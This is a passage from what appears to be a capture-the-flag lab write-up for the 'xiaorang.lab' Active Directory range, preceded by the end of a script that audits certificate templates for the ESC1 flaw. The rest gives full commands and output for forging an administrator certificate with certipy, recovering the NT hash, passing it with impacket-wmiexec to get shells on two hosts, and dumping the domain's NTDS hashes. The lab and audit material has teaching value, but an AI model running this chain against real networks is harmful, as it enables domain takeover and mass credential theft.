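
if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

For the `XR Manager` template every check is true; clearing the enrollee-supplies-subject flag, requiring manager approval, or removing Domain Users and Authenticated Users from the enrollment rights each makes `esc1` false.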
┌──(root㉿kali)-[~]
└─# proxychains -q certipy req -u 'chenchen@xiaorang.lab' -p '@Passw0rd@' -dc-ip '172.22.9.7' -target XIAORANG-DC.xiaorang.lab -ca xiaorang-XIAORANG-DC-CA -template 'XR Manager' -upn 'administrator@xiaorang.lab' -sid 'S-1-5-21-990187620-235975882-534697781-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The resolution lifetime expired after 5.404 seconds: Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@xiaorang.lab'
[*] Certificate object SID is 'S-1-5-21-990187620-235975882-534697781-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Request a TGT for the domain admin
┌──(root㉿kali)-[~]
└─# proxychains -q certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@xiaorang.lab'
[*] SAN URL SID: 'S-1-5-21-990187620-235975882-534697781-500'
[*] Security Extension SID: 'S-1-5-21-990187620-235975882-534697781-500'
[*] Using principal: 'administrator@xiaorang.lab'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-wmiexec xiaorang.lab/administrator@172.22.9.7 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
xiaorang\administrator
C:\>type users\administrator\flag\flag04.txt
______ _ ___
/ _____) _ (_)/ __)
| / ____ ____| |_ _| |__ _ _
| | / _ )/ ___) _)| | __) | | |
| \____( (/ /| | | |__| | | | |_| |
\______)____)_| \___)_|_| \__ |
(____/
flag04: flag{b9ed615c-3f78-4e63-b1e2-e63d935189c3}
Then just pass the hash to the other host
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-wmiexec xiaorang.lab/administrator@172.22.9.26 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type users\administrator\flag\flag03.txt
___ .-.
( ) .-. / \
.--. .--. ___ .-. | |_ ( __) | .`. ; ___ ___
/ \ / \ ( ) \ ( __) (''") | |(___) ( )( )
| .-. ; | .-. ; | ' .-. ; | | | | | |_ | | | |
| |(___) | | | | | / (___) | | ___ | | ( __) | | | |
| | | |/ | | | | |( ) | | | | | ' | |
| | ___ | ' _.' | | | | | | | | | | ' `-' |
| '( ) | .'.-. | | | ' | | | | | | `.__. |
' `-' | ' `-' / | | ' `-' ; | | | | ___ | |
`.__,' `.__.' (___) `.__. (___) (___) ( )' |
; `-' '
.__.'
flag03: flag{1f3702ad-9a15-4e92-98ba-fc9b5a6d6c0e}
C:\>
┌──(root㉿kali)-[~]
└─# proxychains -q nxc smb 172.22.9.7 -u administrator -H '2f1b57eefb2d152196836b0516abea80' --ntds
SMB 172.22.9.7 445 XIAORANG-DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.9.7 445 XIAORANG-DC [+] xiaorang.lab\administrator:2f1b57eefb2d152196836b0516abea80 (Pwn3d!)
SMB 172.22.9.7 445 XIAORANG-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
<SNIP>
SMB 172.22.9.7 445 XIAORANG-DC [+] Dumped 96 NTDS hashes to /root/.nxc/logs/ntds/XIAORANG-DC_172.22.9.7_2025-11-06_113330.ntds of which 94 were added to the database
SMB 172.22.9.7 445 XIAORANG-DC [*] To extract only enabled accounts from the output file, run the following command:
SMB 172.22.9.7 445 XIAORANG-DC [*] cat /root/.nxc/logs/ntds/XIAORANG-DC_172.22.9.7_2025-11-06_113330.ntds | grep -iv disabled | cut -d ':' -f1
SMB 172.22.9.7 445 XIAORANG-DC [*] grep -iv disabled /root/.nxc/logs/ntds/XIAORANG-DC_172.22.9.7_2025-11-06_113330.ntds | cut -d ':' -f1